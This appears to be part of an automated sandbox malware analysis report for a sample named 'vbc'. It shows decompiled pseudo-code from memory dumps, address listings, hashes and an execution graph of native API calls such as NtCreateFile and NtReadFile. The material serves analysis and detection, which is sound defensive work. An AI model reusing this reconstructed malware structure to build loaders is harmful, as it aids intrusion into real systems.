                                              										goto L127;
                                              										L32:
                                              										_t141 =  *0x1f040000;
                                              									}
                                              								}
                                              								goto L19;
                                              							}
                                              							goto L127;
                                              						}
                                              						goto L16;
                                              					}
                                              					_t236 = _t235 +  *((intOrPtr*)(_t235 - 0x4f));
                                              				} else {
                                              					 *__eax =  *__eax + __al;
                                              					__ch = __ch |  *(__edi + 0x32);
                                              					 *__eax =  *__eax + __al;
                                              					__al = __al |  *__eax;
                                              					__bh = __bh +  *((intOrPtr*)(__ebx - 0x4f));
                                              					 *__eax =  *__eax + __al;
                                              					__al = __al + 0x16;
                                              					asm("outsd");
                                              					_t17 = __eax;
                                              					__eax = __ebx;
                                              					__ebx = _t17;
                                              					 *__eax =  *__eax + __al;
                                              					__al = __al |  *__eax;
                                              					__bh = __bh +  *((intOrPtr*)(_t17 - 0x4f));
                                              					 *__eax =  *__eax + __al;
                                              					__eflags =  *__eax;
                                              					L15:
                                              					_t19 = _t260 + _t262 * 2;
                                              					 *_t19 =  *(_t260 + _t262 * 2) + _t130;
                                              					__eflags =  *_t19;
                                              					L16:
                                              					_t131 =  *_t261;
                                              					 *_t261 = _t130;
                                              					 *((intOrPtr*)(_t131 + 0x6f)) =  *((intOrPtr*)(_t131 + 0x6f)) + _t260;
                                              					_t132 = _t131 ^  *_t131;
                                              					 *_t260 =  *_t260 + _t256;
                                              					 *_t260 =  *_t260 + _t132;
                                              					__eflags =  *_t260;
                                              					if( *_t260 != 0) {
                                              						_t235 = _t231 +  *((intOrPtr*)(_t231 - 0x4f));
                                              					} else {
                                              						 *_t132 =  *_t132 + _t132;
                                              						asm("outsd");
                                              						_t120 = _t264;
                                              						_t264 = _t132 + 0x17;
                                              						 *_t120 =  &(_t120[ *_t120]);
                                              						__eflags =  *_t120;
                                              						goto L18;
                                              					}
                                              				}
                                              				L127:
                                              			}

























































































                                              0x0126ba77
                                              0x0126ba77
                                              0x0126ba77
                                              0x0126ba77
                                              0x0126ba77
                                              0x0126ba79
                                              0x0126ba7c
                                              0x0126ba7e
                                              0x0126ba80
                                              0x0126ba81
                                              0x0126bab5
                                              0x0126bab5
                                              0x0126bab7
                                              0x0126bab7
                                              0x0126bab8
                                              0x0126bab8
                                              0x0126bab8
                                              0x0126bab8
                                              0x0126babb
                                              0x0126babf
                                              0x0126bac0
                                              0x0126bac0
                                              0x0126bac1
                                              0x0126bac3
                                              0x0126bac8
                                              0x0126bacc
                                              0x0126bacd
                                              0x0126bacd
                                              0x0126bace
                                              0x0126bad0
                                              0x0126bad2
                                              0x0126bad5
                                              0x0126bad9
                                              0x0126bada
                                              0x0126badc
                                              0x0126bade
                                              0x0126bade
                                              0x0126badf
                                              0x0126bae1
                                              0x0126bae4
                                              0x0126bae6
                                              0x0126bae9
                                              0x0126baeb
                                              0x0126baed
                                              0x0126baed
                                              0x00000000
                                              0x0126baee
                                              0x0126baf0
                                              0x0126baf2
                                              0x0126baf4
                                              0x0126baf5
                                              0x0126baf7
                                              0x0126baf9
                                              0x0126baf9
                                              0x0126bafb
                                              0x00000000
                                              0x0126bafd
                                              0x0126bafd
                                              0x0126bb01
                                              0x0126bb02
                                              0x0126bb02
                                              0x0126bb03
                                              0x0126bb03
                                              0x0126bb05
                                              0x0126bb07
                                              0x0126bb0a
                                              0x0126bb0c
                                              0x0126bb0e
                                              0x0126bb0f
                                              0x0126bb11
                                              0x0126bb13
                                              0x0126bb13
                                              0x0126bb15
                                              0x00000000
                                              0x00000000
                                              0x0126bb17
                                              0x0126bb19
                                              0x0126bb1b
                                              0x0126bb1e
                                              0x0126bb20
                                              0x0126bb22
                                              0x0126bb22
                                              0x0126bb25
                                              0x0126bb25
                                              0x0126bb27
                                              0x0126bb29
                                              0x0126bb2a
                                              0x0126bb2c
                                              0x0126bb2c
                                              0x0126bb2e
                                              0x00000000
                                              0x00000000
                                              0x0126bb30
                                              0x0126bb30
                                              0x0126bb32
                                              0x0126bb35
                                              0x0126bb37
                                              0x0126bb39
                                              0x0126bb3c
                                              0x0126bb3e
                                              0x0126bb40
                                              0x0126bb42
                                              0x0126bb42
                                              0x0126bb42
                                              0x0126bb43
                                              0x0126bbb4
                                              0x0126bbb6
                                              0x0126bbb6
                                              0x0126bbb8
                                              0x00000000
                                              0x0126bbba
                                              0x0126bbba
                                              0x0126bbbe
                                              0x0126bbbf
                                              0x0126bbc0
                                              0x0126bbc0
                                              0x0126bbc1
                                              0x0126bbc1
                                              0x0126bbc3
                                              0x0126bbc3
                                              0x0126bbc5
                                              0x0126bb69
                                              0x00000000
                                              0x0126bb6b
                                              0x0126bb6b
                                              0x0126bb6d
                                              0x0126bb70
                                              0x0126bb74
                                              0x0126bb74
                                              0x00000000
                                              0x0126bb74
                                              0x0126bbc7
                                              0x0126bbc7
                                              0x0126bbc9
                                              0x0126bbcb
                                              0x0126bbcc
                                              0x0126bbce
                                              0x0126bbd0
                                              0x0126bbd0
                                              0x0126bbd2
                                              0x0126bb76
                                              0x0126bb76
                                              0x0126bb7b
                                              0x0126bb7c
                                              0x0126bb7e
                                              0x0126bb80
                                              0x0126bb80
                                              0x0126bb82
                                              0x0126bb25
                                              0x0126bb27
                                              0x0126bb29
                                              0x0126bb2a
                                              0x0126bb2c
                                              0x0126bb2c
                                              0x0126bb2e
                                              0x00000000
                                              0x00000000
                                              0x0126bb84
                                              0x0126bb84
                                              0x0126bb86
                                              0x0126bb86
                                              0x0126bb88
                                              0x0126bb89
                                              0x0126bb8b
                                              0x00000000
                                              0x0126bb8d
                                              0x0126bb8d
                                              0x00000000
                                              0x0126bb8d
                                              0x0126bb8b
                                              0x0126bbd4
                                              0x0126bbd4
                                              0x0126bbd6
                                              0x0126bbd8
                                              0x0126bbdb
                                              0x0126bbdd
                                              0x0126bbdd
                                              0x0126bbdd
                                              0x0126bbdf
                                              0x0126bbe1
                                              0x0126bbe3
                                              0x0126bbe4
                                              0x0126bbe6
                                              0x0126bbe8
                                              0x0126bbe8
                                              0x0126bbea
                                              0x0126bb8e
                                              0x0126bb8e
                                              0x0126bb90
                                              0x0126bb92
                                              0x0126bb95
                                              0x0126bb97
                                              0x0126bb97
                                              0x0126bb99
                                              0x0126bb9a
                                              0x0126bb9c
                                              0x0126bb9e
                                              0x0126bb9e
                                              0x0126bb9f
                                              0x0126bb9f
                                              0x0126bb9f
                                              0x0126bbec
                                              0x0126bbec
                                              0x0126bbee
                                              0x0126bbee
                                              0x0126bbf0
                                              0x0126bbf1
                                              0x0126bbf3
                                              0x0126bc64
                                              0x0126bc64
                                              0x0126bc66
                                              0x0126bc67
                                              0x0126bc69
                                              0x0126bc6b
                                              0x0126bc6b
                                              0x0126bc6d
                                              0x0126bc12
                                              0x0126bc14
                                              0x0126bc16
                                              0x0126bc17
                                              0x0126bc19
                                              0x0126bc1b
                                              0x0126bc1b
                                              0x0126bc1d
                                              0x00000000
                                              0x0126bc1f
                                              0x0126bc1f
                                              0x0126bc1f
                                              0x00000000
                                              0x0126bc1f
                                              0x0126bc6f
                                              0x0126bc6f
                                              0x0126bc71
                                              0x0126bc73
                                              0x0126bc76
                                              0x0126bc78
                                              0x0126bc7a
                                              0x0126bc7a
                                              0x0126bc7b
                                              0x0126bc7b
                                              0x0126bc20
                                              0x0126bc20
                                              0x0126bc23
                                              0x0126bc23
                                              0x0126bc24
                                              0x0126bc25
                                              0x0126bc25
                                              0x0126bc25
                                              0x0126bc7d
                                              0x0126bc7d
                                              0x0126bc7f
                                              0x0126bc81
                                              0x0126bc84
                                              0x0126bc86
                                              0x0126bc89
                                              0x0126bc8b
                                              0x0126bc8d
                                              0x0126bc90
                                              0x0126bc92
                                              0x0126bc94
                                              0x0126bc96
                                              0x0126bc96
                                              0x0126bc96
                                              0x0126bc97
                                              0x0126bd08
                                              0x0126bd0a
                                              0x0126bd0a
                                              0x0126bd0c
                                              0x00000000
                                              0x0126bd0e
                                              0x0126bd0e
                                              0x0126bd12
                                              0x0126bd13
                                              0x0126bd14
                                              0x0126bd16
                                              0x0126bd18
                                              0x0126bd18
                                              0x00000000
                                              0x0126bd18
                                              0x0126bc99
                                              0x0126bc99
                                              0x0126bc9b
                                              0x0126bc9d
                                              0x0126bc9d
                                              0x0126bc9f
                                              0x0126bc44
                                              0x0126bc44
                                              0x0126bc46
                                              0x0126bc47
                                              0x00000000
                                              0x0126bc49
                                              0x0126bc49
                                              0x0126bc4b
                                              0x0126bc4e
                                              0x0126bc50
                                              0x0126bc52
                                              0x0126bc55
                                              0x0126bc57
                                              0x0126bc57
                                              0x00000000
                                              0x0126bc57
                                              0x0126bca1
                                              0x0126bca1
                                              0x0126bca3
                                              0x0126bca5
                                              0x0126bca7
                                              0x0126bcaa
                                              0x0126bcac
                                              0x0126bcaf
                                              0x0126bcb1
                                              0x0126bcb1
                                              0x0126bcb2
                                              0x0126bcb2
                                              0x0126bcb2
                                              0x0126bcb4
                                              0x0126bc59
                                              0x0126bc59
                                              0x0126bc5a
                                              0x0126bc5b
                                              0x0126bc5d
                                              0x0126bc5f
                                              0x0126bc62
                                              0x0126bc62
                                              0x00000000
                                              0x0126bcb6
                                              0x0126bcb6
                                              0x0126bcb8
                                              0x0126bcba
                                              0x0126bcbb
                                              0x0126bcbc
                                              0x0126bcc0
                                              0x0126bcc0
                                              0x0126bcc2
                                              0x0126bcc3
                                              0x0126bcc8
                                              0x0126bccb
                                              0x0126bccb
                                              0x0126bccc
                                              0x0126bccc
                                              0x0126bccf
                                              0x0126bcd0
                                              0x0126bcd2
                                              0x0126bcd4
                                              0x0126bcd4
                                              0x0126bcd6
                                              0x00000000
                                              0x0126bcd8
                                              0x0126bcd8
                                              0x0126bcda
                                              0x0126bcda
                                              0x0126bcdc
                                              0x0126bcdd
                                              0x0126bcdf
                                              0x0126bd50
                                              0x0126bd50
                                              0x0126bd53
                                              0x0126bd56
                                              0x0126bd5b
                                              0x0126bd5d
                                              0x0126bd62
                                              0x0126bd64
                                              0x0126bd66
                                              0x0126bd67
                                              0x0126bd68
                                              0x0126bd6d
                                              0x0126bd70
                                              0x0126bd72
                                              0x0126bd72
                                              0x0126bd73
                                              0x0126bd73
                                              0x0126bd73
                                              0x0126bd75
                                              0x0126bd1b
                                              0x0126bd1b
                                              0x0126bd1d
                                              0x0126bd1f
                                              0x0126bd20
                                              0x0126bd22
                                              0x0126bd24
                                              0x0126bd24
                                              0x0126bd26
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0126bd77
                                              0x0126bd77
                                              0x0126bd77
                                              0x0126bd78
                                              0x0126bd78
                                              0x0126bd78
                                              0x0126bd78
                                              0x0126bd79
                                              0x0126bd7b
                                              0x0126bd7c
                                              0x0126bd7e
                                              0x0126bd80
                                              0x0126bd80
                                              0x0126bd82
                                              0x0126bd28
                                              0x0126bd28
                                              0x0126bd2a
                                              0x0126bd2c
                                              0x0126bd2d
                                              0x0126bd30
                                              0x0126bd32
                                              0x0126bd35
                                              0x0126bd37
                                              0x0126bd39
                                              0x0126bd3c
                                              0x0126bd45
                                              0x0126bd45
                                              0x00000000
                                              0x0126bd84
                                              0x0126bd84
                                              0x0126bd86
                                              0x0126bd86
                                              0x0126bd88
                                              0x0126bd89
                                              0x0126bd8b
                                              0x0126bdfc
                                              0x0126bdfc
                                              0x0126bdfe
                                              0x0126be00
                                              0x0126be00
                                              0x0126bd8d
                                              0x0126bd8d
                                              0x0126bd92
                                              0x0126bd95
                                              0x0126bd97
                                              0x0126bd97
                                              0x0126bd98
                                              0x0126bd99
                                              0x0126bd9a
                                              0x0126bd9c
                                              0x0126bd9e
                                              0x0126bd9e
                                              0x0126bda0
                                              0x0126bd46
                                              0x0126bd46
                                              0x0126bd48
                                              0x0126bd4a
                                              0x0126bd4a
                                              0x0126bda2
                                              0x0126bda2
                                              0x0126bda6
                                              0x0126bda8
                                              0x0126bda8
                                              0x0126bdad
                                              0x0126bdaf
                                              0x0126bdaf
                                              0x0126bdb1
                                              0x0126bdb2
                                              0x0126bdb4
                                              0x0126bdb6
                                              0x0126bdb6
                                              0x0126bdb8
                                              0x0126bd4f
                                              0x0126bd4f
                                              0x00000000
                                              0x0126bdba
                                              0x0126bdba
                                              0x0126bdbc
                                              0x0126bdbe
                                              0x0126bdbf
                                              0x0126bdc1
                                              0x0126bdc1
                                              0x0126bdc3
                                              0x00000000
                                              0x0126bdc5
                                              0x0126bdc5
                                              0x0126bdc7
                                              0x0126bdc9
                                              0x0126bdca
                                              0x0126bdcc
                                              0x0126bdce
                                              0x0126bdd1
                                              0x0126bdd1
                                              0x0126bdd2
                                              0x0126bdd5
                                              0x0126bdd6
                                              0x0126bdd8
                                              0x0126bdda
                                              0x0126bdda
                                              0x0126bddc
                                              0x00000000
                                              0x0126bdde
                                              0x0126bdde
                                              0x0126bde0
                                              0x0126bde2
                                              0x0126bde3
                                              0x0126bde6
                                              0x0126bde8
                                              0x0126bdeb
                                              0x0126bded
                                              0x0126bdf2
                                              0x0126bdf4
                                              0x0126bdf6
                                              0x0126bdf6
                                              0x0126bdf7
                                              0x0126bdf9
                                              0x0126be6a
                                              0x0126be6a
                                              0x0126be6c
                                              0x0126be71
                                              0x0126be73
                                              0x0126be75
                                              0x0126be76
                                              0x0126be78
                                              0x0126be7a
                                              0x0126be7e
                                              0x0126be7e
                                              0x0126be7f
                                              0x0126be7f
                                              0x0126be7f
                                              0x0126be7f
                                              0x0126be82
                                              0x0126be87
                                              0x0126be89
                                              0x0126be8b
                                              0x0126be8c
                                              0x0126be8e
                                              0x0126be90
                                              0x0126be94
                                              0x0126be96
                                              0x0126be96
                                              0x0126be98
                                              0x0126be99
                                              0x0126be99
                                              0x0126be9b
                                              0x0126be9e
                                              0x0126be9e
                                              0x0126be9f
                                              0x0126bea1
                                              0x0126bea2
                                              0x0126bea4
                                              0x0126bea6
                                              0x0126beaa
                                              0x0126beac
                                              0x0126beac
                                              0x0126beae
                                              0x0126beb3
                                              0x0126beb3
                                              0x0126beb5
                                              0x0126beb7
                                              0x0126beb8
                                              0x0126beba
                                              0x0126bebc
                                              0x0126bec0
                                              0x0126bec7
                                              0x0126bec7
                                              0x0126bec9
                                              0x00000000
                                              0x00000000
                                              0x0126becb
                                              0x0126becb
                                              0x0126becd
                                              0x0126becd
                                              0x0126becd
                                              0x0126becf
                                              0x0126bed0
                                              0x0126bed1
                                              0x0126bed2
                                              0x0126bed4
                                              0x0126bed6
                                              0x0126bed9
                                              0x0126bee0
                                              0x0126bee0
                                              0x0126bee2
                                              0x00000000
                                              0x00000000
                                              0x0126bee4
                                              0x0126bee6
                                              0x0126bee6
                                              0x0126bee7
                                              0x0126bee7
                                              0x0126bee9
                                              0x0126beea
                                              0x0126beeb
                                              0x0126beed
                                              0x0126beef
                                              0x0126bef2
                                              0x0126bef9
                                              0x0126bef9
                                              0x0126befb
                                              0x00000000
                                              0x00000000
                                              0x0126befd
                                              0x0126beff
                                              0x0126bf01
                                              0x0126bf02
                                              0x0126bf03
                                              0x0126bf04
                                              0x0126bf06
                                              0x0126bf08
                                              0x0126bf0b
                                              0x0126bf12
                                              0x0126bf12
                                              0x0126bf14
                                              0x00000000
                                              0x00000000
                                              0x0126bf16
                                              0x0126bf18
                                              0x0126bf1a
                                              0x0126bf1b
                                              0x0126bf1c
                                              0x0126bf1d
                                              0x0126bf1f
                                              0x0126bf1f
                                              0x0126bf21
                                              0x0126bf24
                                              0x0126bf2b
                                              0x0126bf2b
                                              0x0126bf2d
                                              0x00000000
                                              0x00000000
                                              0x0126bf2f
                                              0x0126bf31
                                              0x0126bf33
                                              0x0126bf34
                                              0x0126bf35
                                              0x0126bf36
                                              0x0126bf38
                                              0x0126bf3d
                                              0x0126bf3f
                                              0x0126bf3f
                                              0x0126bf41
                                              0x0126bf42
                                              0x00000000
                                              0x0126bf42
                                              0x00000000
                                              0x0126bee7
                                              0x00000000
                                              0x0126bdfb
                                              0x0126bdfb
                                              0x0126bdfb
                                              0x00000000
                                              0x0126bdfb
                                              0x0126bdf9
                                              0x0126bddc
                                              0x0126bdc3
                                              0x0126bdb8
                                              0x0126bda0
                                              0x0126bd8b
                                              0x0126bd82
                                              0x0126bce1
                                              0x0126bce1
                                              0x0126bce6
                                              0x0126bce9
                                              0x0126bceb
                                              0x0126bceb
                                              0x0126bced
                                              0x0126bcee
                                              0x0126bcf0
                                              0x0126bcf0
                                              0x0126bcf1
                                              0x0126bcf3
                                              0x0126bcf3
                                              0x0126bcf3
                                              0x0126bcdf
                                              0x0126bcd6
                                              0x0126bcb4
                                              0x0126bc9f
                                              0x0126bc97
                                              0x0126bc7b
                                              0x0126bbf5
                                              0x0126bbf5
                                              0x0126bbf7
                                              0x0126bbf9
                                              0x0126bbf9
                                              0x0126bbfb
                                              0x0126bbfc
                                              0x0126bbfc
                                              0x0126bbfc
                                              0x0126bbf3
                                              0x0126bbea
                                              0x0126bbd2
                                              0x0126bbc5
                                              0x0126bb45
                                              0x0126bb45
                                              0x0126bb47
                                              0x0126bb49
                                              0x0126bb49
                                              0x0126bb4b
                                              0x00000000
                                              0x0126bb4d
                                              0x0126bb4d
                                              0x0126bb4f
                                              0x0126bb51
                                              0x0126bb53
                                              0x0126bb56
                                              0x0126bb58
                                              0x0126bb5b
                                              0x0126bb5b
                                              0x0126bb5c
                                              0x0126bb5c
                                              0x0126bb5e
                                              0x0126bb5e
                                              0x0126bb60
                                              0x00000000
                                              0x0126bb60
                                              0x0126bb4b
                                              0x00000000
                                              0x0126bb61
                                              0x0126bb61
                                              0x0126bb61
                                              0x0126bb25
                                              0x00000000
                                              0x0126bb03
                                              0x00000000
                                              0x0126bafb
                                              0x00000000
                                              0x0126baee
                                              0x0126ba6c
                                              0x0126ba84
                                              0x0126ba84
                                              0x0126ba86
                                              0x0126ba89
                                              0x0126ba8b
                                              0x0126ba8d
                                              0x0126ba90
                                              0x0126ba92
                                              0x0126ba94
                                              0x0126ba95
                                              0x0126ba95
                                              0x0126ba95
                                              0x0126ba96
                                              0x0126ba98
                                              0x0126ba9a
                                              0x0126ba9d
                                              0x0126ba9d
                                              0x0126ba9e
                                              0x0126ba9e
                                              0x0126ba9e
                                              0x0126ba9e
                                              0x0126baa1
                                              0x0126baa1
                                              0x0126baa1
                                              0x0126baa3
                                              0x0126baa6
                                              0x0126baa8
                                              0x0126baaa
                                              0x0126baaa
                                              0x0126baac
                                              0x0126ba5f
                                              0x0126baae
                                              0x0126baae
                                              0x0126bab2
                                              0x0126bab3
                                              0x0126bab3
                                              0x0126bab4
                                              0x0126bab4
                                              0x00000000
                                              0x0126bab4
                                              0x0126baac
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997925287.0000000001262000.00000020.00000001.01000000.00000004.sdmp, Offset: 01260000, based on PE: true
                                              • Associated: 00000004.00000002.997920683.0000000001260000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.998325826.0000000001314000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1260000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1772cc40dcb30df0ab48605e62a559957cd80c8d5873ebfb0e2c7570a78de124
                                              • Instruction ID: 8cef6ebbe3208def181ada99f4a9636bb13f5d6c87d9cb1dc626e6b237492666
                                              • Opcode Fuzzy Hash: 1772cc40dcb30df0ab48605e62a559957cd80c8d5873ebfb0e2c7570a78de124
                                              • Instruction Fuzzy Hash: 1142CE51A1E7C29FDB074B781DB5294BFB4AD5321475E18C3C0C0CF0EBE21869AAE726
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 421827b7803927c3280bdc27a384e9ae08d46007b0fb8c0ca84be9a2cd7ca0d8
                                              • Instruction ID: 988157b9c05c12f38eee821e839bac590b6686e86294269a760b720b828e781d
                                              • Opcode Fuzzy Hash: 421827b7803927c3280bdc27a384e9ae08d46007b0fb8c0ca84be9a2cd7ca0d8
                                              • Instruction Fuzzy Hash: B7A1EF74D01258CFDB14DFA6C4847EEBBB2BF89304F60856AC409AB356DB759986CF80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997698805.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_680000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 41668273aa84113b8e6920267b884947351137716e8c0d88020b75f9159bfe43
                                              • Instruction ID: e497d5d751ff1336e80a74f570291146905f1f5bb7dbbe239516004270d409b4
                                              • Opcode Fuzzy Hash: 41668273aa84113b8e6920267b884947351137716e8c0d88020b75f9159bfe43
                                              • Instruction Fuzzy Hash: 664152B1D056588BEB5CCF6B8D4468EFAF3AFC8301F18C1BA850DAB215DB3109858F41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f83fe5697c9271e5aa7fec8adfd4f871ac2afb63fbe49553e10a3e122d5e1733
                                              • Instruction ID: e567e03a7504d9d0e2a7f50fc7b90e1ba94aece09255ab371be2ba4b0d57e70d
                                              • Opcode Fuzzy Hash: f83fe5697c9271e5aa7fec8adfd4f871ac2afb63fbe49553e10a3e122d5e1733
                                              • Instruction Fuzzy Hash: D4415571E05B188BEB5CCF6B9D4129AFAF7AFC9301F14D1BA894CAA265DB3005468F11
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Execution Graph

                                              Execution Coverage:3.6%
                                              Dynamic/Decrypted Code Coverage:2.3%
                                              Signature Coverage:5.7%
                                              Total number of Nodes:615
                                              Total number of Limit Nodes:78
                                              execution_graph 38124 41f270 38127 41b9d0 38124->38127 38128 41b9f6 38127->38128 38139 409160 38128->38139 38130 41ba02 38138 41ba49 38130->38138 38147 40d770 38130->38147 38132 41ba17 38135 41ba2c 38132->38135 38195 41a660 38132->38195 38159 40ac10 38135->38159 38136 41ba3b 38137 41a660 2 API calls 38136->38137 38137->38138 38198 4090b0 38139->38198 38141 40916d 38142 409174 38141->38142 38210 409050 38141->38210 38142->38130 38148 40d79c 38147->38148 38614 40a610 38148->38614 38150 40d7ae 38618 40d680 38150->38618 38153 40d7c9 38154 41a440 2 API calls 38153->38154 38156 40d7d4 38153->38156 38154->38156 38155 40d7e1 38157 41a440 2 API calls 38155->38157 38158 40d7f2 38155->38158 38156->38132 38157->38158 38158->38132 38160 40ac35 38159->38160 38161 40a610 LdrLoadDll 38160->38161 38162 40ac8c 38161->38162 38637 40a290 38162->38637 38164 40af03 38164->38136 38165 40acb2 38165->38164 38646 414ff0 38165->38646 38167 40acf7 38167->38164 38650 407e10 38167->38650 38169 40ad3b 38169->38164 38667 41a4b0 38169->38667 38173 40ad91 38174 40ad98 38173->38174 38679 419fc0 38173->38679 38175 41bef0 2 API calls 38174->38175 38177 40ada5 38175->38177 38177->38136 38179 40ade2 38180 41bef0 2 API calls 38179->38180 38181 40ade9 38180->38181 38181->38136 38182 40adf2 38183 40d800 3 API calls 38182->38183 38184 40ae66 38183->38184 38184->38174 38185 40ae71 38184->38185 38186 41bef0 2 API calls 38185->38186 38187 40ae95 38186->38187 38684 41a010 38187->38684 38190 419fc0 2 API calls 38191 40aed0 38190->38191 38191->38164 38689 419dd0 38191->38689 38194 41a660 2 API calls 38194->38164 38196 41a67f ExitProcess 38195->38196 38197 41af60 LdrLoadDll 38195->38197 38197->38196 38199 4090c3 38198->38199 38249 418b80 LdrLoadDll 38198->38249 38229 418a30 38199->38229 38202 4090d6 38202->38141 38203 4090cc 38203->38202 38232 41b310 38203->38232 38205 409113 38205->38202 38243 408ed0 38205->38243 38207 409133 38250 408920 LdrLoadDll 38207->38250 38209 409145 38209->38141 38588 41b600 38210->38588 38213 41b600 LdrLoadDll 38214 40907b 38213->38214 38215 41b600 LdrLoadDll 38214->38215 38216 409091 38215->38216 38217 40d570 38216->38217 38218 40d589 38217->38218 38597 40a490 38218->38597 38220 40d59c 38601 41a190 38220->38601 38223 409185 38223->38130 38225 40d5c2 38226 40d5ed 38225->38226 38607 41a210 38225->38607 38228 41a440 2 API calls 38226->38228 38228->38223 38251 41a5b0 38229->38251 38233 41b329 38232->38233 38259 4156a0 38233->38259 38235 41b341 38236 41b34a 38235->38236 38298 41b150 38235->38298 38236->38205 38238 41b35e 38238->38236 38315 419eb0 38238->38315 38566 407210 38243->38566 38245 408ef1 38245->38207 38246 408eea 38246->38245 38579 4074d0 38246->38579 38249->38199 38250->38209 38254 41af60 38251->38254 38253 418a45 38253->38203 38255 41afe5 38254->38255 38257 41af6f 38254->38257 38255->38253 38257->38255 38258 415aa0 LdrLoadDll 38257->38258 38258->38255 38260 4159d5 38259->38260 38262 4156b4 38259->38262 38260->38235 38262->38260 38323 419c00 38262->38323 38264 4157e0 38326 41a310 38264->38326 38265 4157c3 38383 41a410 LdrLoadDll 38265->38383 38268 4157cd 38268->38235 38269 415807 38270 41bef0 2 API calls 38269->38270 38271 415813 38270->38271 38271->38268 38272 415999 38271->38272 38273 4159af 38271->38273 38278 4158a2 38271->38278 38274 41a440 2 API calls 38272->38274 38392 4153e0 LdrLoadDll NtReadFile NtClose 38273->38392 38275 4159a0 38274->38275 38275->38235 38277 4159c2 38277->38235 38279 415909 38278->38279 38281 4158b1 38278->38281 38279->38272 38280 41591c 38279->38280 38385 41a290 38280->38385 38283 4158b6 38281->38283 38284 4158ca 38281->38284 38384 4152a0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 38283->38384 38287 4158e7 38284->38287 38288 4158cf 38284->38288 38287->38275 38341 415060 38287->38341 38329 415340 38288->38329 38290 4158c0 38290->38235 38292 41597c 38389 41a440 38292->38389 38293 4158dd 38293->38235 38296 4158ff 38296->38235 38297 415988 38297->38235 38299 41b16b 38298->38299 38300 41b17d 38299->38300 38410 41be70 38299->38410 38300->38238 38302 41b19d 38413 414cc0 38302->38413 38304 41b1c0 38304->38300 38305 414cc0 3 API calls 38304->38305 38306 41b1e2 38305->38306 38306->38300 38438 415fe0 38306->38438 38308 41b26a 38309 41b27a 38308->38309 38533 41aee0 LdrLoadDll 38308->38533 38449 41ad50 38309->38449 38312 41b2a8 38528 419e70 38312->38528 38316 41af60 LdrLoadDll 38315->38316 38317 419ecc 38316->38317 38562 87fae8 LdrInitializeThunk 38317->38562 38318 419ee7 38320 41bef0 38318->38320 38563 41a620 38320->38563 38322 41b3b9 38322->38205 38324 415794 38323->38324 38325 41af60 LdrLoadDll 38323->38325 38324->38264 38324->38265 38324->38268 38325->38324 38327 41a32c NtCreateFile 38326->38327 38328 41af60 LdrLoadDll 38326->38328 38327->38269 38328->38327 38330 41535c 38329->38330 38331 41a290 LdrLoadDll 38330->38331 38332 41537d 38331->38332 38333 415384 38332->38333 38334 415398 38332->38334 38335 41a440 2 API calls 38333->38335 38336 41a440 2 API calls 38334->38336 38337 41538d 38335->38337 38338 4153a1 38336->38338 38337->38293 38393 41c100 LdrLoadDll RtlAllocateHeap 38338->38393 38340 4153ac 38340->38293 38342 4150ab 38341->38342 38343 4150de 38341->38343 38346 41a290 LdrLoadDll 38342->38346 38344 415229 38343->38344 38348 4150fa 38343->38348 38345 41a290 LdrLoadDll 38344->38345 38352 415244 38345->38352 38347 4150c6 38346->38347 38350 41a440 2 API calls 38347->38350 38349 41a290 LdrLoadDll 38348->38349 38351 415115 38349->38351 38353 4150cf 38350->38353 38355 415131 38351->38355 38356 41511c 38351->38356 38406 41a2d0 LdrLoadDll 38352->38406 38353->38296 38359 415136 38355->38359 38360 41514c 38355->38360 38358 41a440 2 API calls 38356->38358 38357 41527e 38361 41a440 2 API calls 38357->38361 38362 415125 38358->38362 38363 41a440 2 API calls 38359->38363 38368 415151 38360->38368 38394 41c0c0 38360->38394 38364 415289 38361->38364 38362->38296 38365 41513f 38363->38365 38364->38296 38365->38296 38377 415163 38368->38377 38397 41a3c0 38368->38397 38369 4151b7 38370 4151ce 38369->38370 38405 41a250 LdrLoadDll 38369->38405 38372 4151d5 38370->38372 38373 4151ea 38370->38373 38374 41a440 2 API calls 38372->38374 38375 41a440 2 API calls 38373->38375 38374->38377 38376 4151f3 38375->38376 38378 41521f 38376->38378 38400 41bcc0 38376->38400 38377->38296 38378->38296 38380 41520a 38381 41bef0 2 API calls 38380->38381 38382 415213 38381->38382 38382->38296 38383->38268 38384->38290 38386 41af60 LdrLoadDll 38385->38386 38387 415964 38385->38387 38386->38387 38388 41a2d0 LdrLoadDll 38387->38388 38388->38292 38390 41af60 LdrLoadDll 38389->38390 38391 41a45c NtClose 38390->38391 38391->38297 38392->38277 38393->38340 38407 41a5e0 38394->38407 38396 41c0d8 38396->38368 38398 41af60 LdrLoadDll 38397->38398 38399 41a3dc NtReadFile 38398->38399 38399->38369 38401 41bce4 38400->38401 38402 41bccd 38400->38402 38401->38380 38402->38401 38403 41c0c0 2 API calls 38402->38403 38404 41bcfb 38403->38404 38404->38380 38405->38370 38406->38357 38408 41af60 